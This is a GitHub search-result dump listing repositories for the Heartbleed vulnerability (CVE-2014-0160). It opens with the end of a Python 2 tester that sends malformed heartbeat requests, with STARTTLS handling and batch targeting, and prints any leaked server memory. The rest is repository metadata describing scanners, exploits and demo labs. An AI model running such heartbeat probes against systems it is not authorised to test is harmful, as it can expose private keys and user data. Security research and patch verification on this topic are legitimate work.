''          if typ == 24:             if opts.verbose:                 print 'Received heartbeat response...'             #hexdump(pay)             if len(pay) > 3:                 print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'             else:                 print 'Server processed malformed heartbeat, but did not return any extra data.'             return hexdump(pay)          if typ == 21:             print 'Received alert:'             hexdump(pay)             print 'Server returned error, likely not vulnerable'             return ''  def bleed(targ, port):     try:         res = ''         print         print '##################################################################'         print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls)         for x in range(0, opts.num):             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)             sys.stdout.flush()             s.settimeout(10)             s.connect((targ, port))              # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used             if (opts.starttls) or (port in {25, 587, 110, 143, 21}):                                  stls = False                 atls = False                                  # check if smtp supports starttls\/stls                 if port in {25, 587}:                     print 'SMTP Port... Checking for STARTTLS Capability...'                     check = s.recv(1024)                     s.send(\"EHLO someone.org\\n\")                     sys.stdout.flush()                     check += s.recv(1024)                     if opts.verbose:                         print check                                                              if \"STARTTLS\" in check:                         opts.starttls = True                         print \"STARTTLS command found\"                     elif \"STLS\" in check:                         opts.starttls = True                         stls = True                         print \"STLS command found\"                     else:                         print \"STARTTLS command NOT found!\"                         print '##################################################################'                         return                                  # check if pop3\/imap supports starttls\/stls                                             elif port in {110, 143}:                     print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...'                     check = s.recv(1024)                     if port == 110:                         s.send(\"CAPA\\n\")                     if port == 143:                         s.send(\"CAPABILITY\\n\")                     sys.stdout.flush()                     check += s.recv(1024)                     if opts.verbose:                         print check                                                                 if \"STARTTLS\" in check:                         opts.starttls = True                         print \"STARTTLS command found\"                     elif \"STLS\" in check:                         opts.starttls = True                         stls = True                         print \"STLS command found\"                     else:                         print \"STARTTLS command NOT found!\"                         print '##################################################################'                         return                                          # check if ftp supports auth tls\/starttls                                           elif port in {21}:                     print 'FTP Port... Checking for AUTH TLS Capability...'                     check = s.recv(1024)                     s.send(\"FEAT\\n\")                     sys.stdout.flush()                     check += s.recv(1024)                     if opts.verbose:                         print check                                              if \"STARTTLS\" in check:                         opts.starttls = True                         print \"STARTTLS command found\"                     elif \"AUTH TLS\" in check:                         opts.starttls = True                         atls = True                         print \"AUTH TLS command found\"                     else:                         print \"STARTTLS command NOT found!\"                         print '##################################################################'                         return                                                          # send appropriate tls command if supported                                         if opts.starttls:                            sys.stdout.flush()                     if stls:                         print 'Sending STLS Command...'                         s.send(\"STLS\\n\")                     elif atls:                         print 'Sending AUTH TLS Command...'                         s.send(\"AUTH TLS\\n\")                     else:                         print 'Sending STARTTLS Command...'                         s.send(\"STARTTLS\\n\")                     if opts.verbose:                         print 'Waiting for reply...'                     sys.stdout.flush()                     recvall(s, 100000, 1)              print             print 'Sending Client Hello...'             sys.stdout.flush()             s.send(hello)             if opts.verbose:                 print 'Waiting for Server Hello...'             sys.stdout.flush()             while True:                 typ, ver, pay = recvmsg(s)                 if typ == None:                     print 'Server closed connection without sending Server Hello.'                     print '##################################################################'                     return                 # Look for server hello done message.                 if typ == 22 and ord(pay[0]) == 0x0E:                     break              print 'Sending heartbeat request...'             sys.stdout.flush()             s.send(hb)             res += hit_hb(s, targ)             s.close()                  print '##################################################################'         print                return res          except:        print \"Error connecting to host: \", sys.exc_info()[0]        print '##################################################################'        print                 def main():     allresults = ''                          # if a file is specified, loop through file     if opts.filein:         fileIN = open(opts.filein, \"r\")                  for line in fileIN:             targetinfo = line.strip().split(\":\")             if len(targetinfo) > 1:                 allresults = bleed(targetinfo[0], int(targetinfo[1]))             else:                 allresults = bleed(targetinfo[0], opts.port)                          if allresults:                 print '%s' % (allresults)          fileIN.close()      else:         if len(args) < 1:             options.print_help()             return         allresults = bleed(args[0], opts.port)         if allresults:             print '%s' % (allresults)          print      if __name__ == '__main__':     main()",
        "fork": false,
        "created_at": "2015-04-05T22:03:30Z",
        "updated_at": "2020-05-28T14:44:33Z",
        "pushed_at": "2015-04-05T22:03:31Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 35284258,
        "name": "heartbleed",
        "full_name": "iSCInc\/heartbleed",
        "owner": {
            "login": "iSCInc",
            "id": 6920447,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6920447?v=4",
            "html_url": "https:\/\/github.com\/iSCInc"
        },
        "html_url": "https:\/\/github.com\/iSCInc\/heartbleed",
        "description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..",
        "fork": false,
        "created_at": "2015-05-08T14:37:44Z",
        "updated_at": "2015-05-15T13:19:04Z",
        "pushed_at": "2015-05-15T13:20:41Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 37109043,
        "name": "cve-2014-0160-Yunfeng-Jiang",
        "full_name": "marstornado\/cve-2014-0160-Yunfeng-Jiang",
        "owner": {
            "login": "marstornado",
            "id": 1574834,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574834?v=4",
            "html_url": "https:\/\/github.com\/marstornado"
        },
        "html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang",
        "description": null,
        "fork": false,
        "created_at": "2015-06-09T03:55:14Z",
        "updated_at": "2015-06-09T04:03:10Z",
        "pushed_at": "2015-06-09T04:14:11Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 1,
        "forks": 1,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 38980774,
        "name": "vaas-cve-2014-0160",
        "full_name": "hmlio\/vaas-cve-2014-0160",
        "owner": {
            "login": "hmlio",
            "id": 11684719,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4",
            "html_url": "https:\/\/github.com\/hmlio"
        },
        "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160",
        "description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed",
        "fork": false,
        "created_at": "2015-07-12T22:40:54Z",
        "updated_at": "2020-03-25T02:25:24Z",
        "pushed_at": "2019-10-08T10:03:04Z",
        "stargazers_count": 12,
        "watchers_count": 12,
        "forks_count": 7,
        "forks": 7,
        "watchers": 12,
        "score": 0
    },
    {
        "id": 43054972,
        "name": "heartbleedscanner",
        "full_name": "hybridus\/heartbleedscanner",
        "owner": {
            "login": "hybridus",
            "id": 5206389,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206389?v=4",
            "html_url": "https:\/\/github.com\/hybridus"
        },
        "html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner",
        "description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ",
        "fork": false,
        "created_at": "2015-09-24T08:39:28Z",
        "updated_at": "2020-04-15T09:18:54Z",
        "pushed_at": "2015-09-24T16:15:11Z",
        "stargazers_count": 14,
        "watchers_count": 14,
        "forks_count": 11,
        "forks": 11,
        "watchers": 14,
        "score": 0
    },
    {
        "id": 51847934,
        "name": "CVE-2014-0160-Chrome-Plugin",
        "full_name": "Xyl2k\/CVE-2014-0160-Chrome-Plugin",
        "owner": {
            "login": "Xyl2k",
            "id": 8536299,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8536299?v=4",
            "html_url": "https:\/\/github.com\/Xyl2k"
        },
        "html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin",
        "description": "Heartbleed",
        "fork": false,
        "created_at": "2016-02-16T15:49:55Z",
        "updated_at": "2016-02-16T15:49:55Z",
        "pushed_at": "2016-02-16T16:04:33Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 1,
        "forks": 1,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 156641077,
        "name": "OpenSSL-HeartBleed-CVE-2014-0160-PoC",
        "full_name": "caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
        "owner": {
            "login": "caiqiqi",
            "id": 8278315,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8278315?v=4",
            "html_url": "https:\/\/github.com\/caiqiqi"
        },
        "html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
        "description": "来自:https:\/\/www.freebuf.com\/articles\/web\/31700.html",
        "fork": false,
        "created_at": "2018-11-08T02:50:28Z",
        "updated_at": "2018-11-08T02:51:58Z",
        "pushed_at": "2018-11-08T02:51:56Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 4,
        "forks": 4,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 161246011,
        "name": "HeartBleed",
        "full_name": "Saymeis\/HeartBleed",
        "owner": {
            "login": "Saymeis",
            "id": 42687972,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42687972?v=4",
            "html_url": "https:\/\/github.com\/Saymeis"
        },
        "html_url": "https:\/\/github.com\/Saymeis\/HeartBleed",
        "description": "CVE-2014-0160",
        "fork": false,
        "created_at": "2018-12-10T22:42:51Z",
        "updated_at": "2019-07-31T23:10:49Z",
        "pushed_at": "2019-05-19T15:13:33Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 0,
        "forks": 0,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 164344882,
        "name": "cve-2014-0160",
        "full_name": "cved-sources\/cve-2014-0160",
        "owner": {
            "login": "cved-sources",
            "id": 46423677,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4",
            "html_url": "https:\/\/github.com\/cved-sources"
        },
        "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160",
        "description": "cve-2014-0160",
        "fork": false,
        "created_at": "2019-01-06T20:57:53Z",
        "updated_at": "2019-01-06T20:59:30Z",
        "pushed_at": "2019-01-06T20:59:29Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 2,
        "forks": 2,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 172987767,
        "name": "heartbleed",
        "full_name": "cheese-hub\/heartbleed",
        "owner": {
            "login": "cheese-hub",
            "id": 41589726,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589726?v=4",
            "html_url": "https:\/\/github.com\/cheese-hub"
        },
        "html_url": "https:\/\/github.com\/cheese-hub\/heartbleed",
        "description": "Demonstration of the Heartbleed Bug CVE-2014-0160",
        "fork": false,
        "created_at": "2019-02-27T20:46:41Z",
        "updated_at": "2019-06-27T13:00:13Z",
        "pushed_at": "2019-06-27T13:00:11Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 2,
        "forks": 2,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 179123466,
        "name": "cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
        "full_name": "artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
        "owner": {
            "login": "artofscripting-zz",
            "id": 1545672,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1545672?v=4",
            "html_url": "https:\/\/github.com\/artofscripting-zz"
        },
        "html_url": "https:\/\/github.com\/artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
        "description": null,
        "fork": false,
        "created_at": "2019-04-02T17:08:01Z",
        "updated_at": "2019-04-02T18:11:08Z",
        "pushed_at": "2019-04-02T18:11:07Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 1,
        "forks": 1,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 179373566,
        "name": "heartbleed-bug",
        "full_name": "cldme\/heartbleed-bug",
        "owner": {
            "login": "cldme",
            "id": 10621824,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10621824?v=4",
            "html_url": "https:\/\/github.com\/cldme"
        },
        "html_url": "https:\/\/github.com\/cldme\/heartbleed-bug",
        "description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔",
        "fork": false,
        "created_at": "2019-04-03T21:32:50Z",
        "updated_at": "2019-04-10T16:42:44Z",
        "pushed_at": "2019-04-10T16:42:43Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 200631397,
        "name": "Heartexploit",
        "full_name": "ThanHuuTuan\/Heartexploit",
        "owner": {
            "login": "ThanHuuTuan",
            "id": 32167814,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4",
            "html_url": "https:\/\/github.com\/ThanHuuTuan"
        },
        "html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit",
        "description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.",
        "fork": false,
        "created_at": "2019-08-05T10:09:44Z",
        "updated_at": "2020-08-22T02:07:50Z",
        "pushed_at": "2018-05-07T19:11:20Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 234023877,
        "name": "heartbleed_fix_updated",
        "full_name": "hack3r-0m\/heartbleed_fix_updated",
        "owner": {
            "login": "hack3r-0m",
            "id": 54898623,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54898623?v=4",
            "html_url": "https:\/\/github.com\/hack3r-0m"
        },
        "html_url": "https:\/\/github.com\/hack3r-0m\/heartbleed_fix_updated",
        "description": "updating services to fix Heart-bleed bug (CVE-2014-0160)",
        "fork": false,
        "created_at": "2020-01-15T07:31:04Z",
        "updated_at": "2020-01-16T04:24:29Z",
        "pushed_at": "2020-01-16T04:24:27Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 277099398,
        "name": "heartbleed",
        "full_name": "rouze-d\/heartbleed",
        "owner": {
            "login": "rouze-d",
            "id": 50823809,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50823809?v=4",
            "html_url": "https:\/\/github.com\/rouze-d"
        },
        "html_url": "https:\/\/github.com\/rouze-d\/heartbleed",
        "description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)",
        "fork": false,
        "created_at": "2020-07-04T11:46:51Z",
        "updated_at": "2020-07-04T12:12:06Z",
        "pushed_at": "2020-07-04T12:12:04Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 319993085,
        "name": "CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
        "full_name": "WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
        "owner": {
            "login": "WildfootW",
            "id": 11520473,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4",
            "html_url": "https:\/\/github.com\/WildfootW"
        },
        "html_url": "https:\/\/github.com\/WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed",
        "description": null,
        "fork": false,
        "created_at": "2020-12-09T15:08:21Z",
        "updated_at": "2020-12-09T15:08:56Z",
        "pushed_at": "2020-12-09T15:08:53Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 321147840,
        "name": "heartbleed",
        "full_name": "GuillermoEscobero\/heartbleed",
        "owner": {
            "login": "GuillermoEscobero",
            "id": 15904345,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904345?v=4",
            "html_url": "https:\/\/github.com\/GuillermoEscobero"
        },
        "html_url": "https:\/\/github.com\/GuillermoEscobero\/heartbleed",
        "description": "CVE-2014-0160 OpenSSL Heartbleed Proof of Concept",
        "fork": false,
        "created_at": "2020-12-13T19:53:50Z",
        "updated_at": "2020-12-20T17:05:21Z",
        "pushed_at": "2020-12-14T19:15:20Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 0,
        "forks": 0,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 325974459,
        "name": "A2SV--SSL-VUL-Scan",
        "full_name": "nyc-tophile\/A2SV--SSL-VUL-Scan",
        "owner": {
            "login": "nyc-tophile",
            "id": 75995332,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4",
            "html_url": "https:\/\/github.com\/nyc-tophile"
        },
        "html_url": "https:\/\/github.com\/nyc-tophile\/A2SV--SSL-VUL-Scan",
        "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device",
        "fork": false,
        "created_at": "2021-01-01T12:26:08Z",
        "updated_at": "2021-01-22T20:27:11Z",
        "pushed_at": "2021-01-01T12:26:10Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    }
]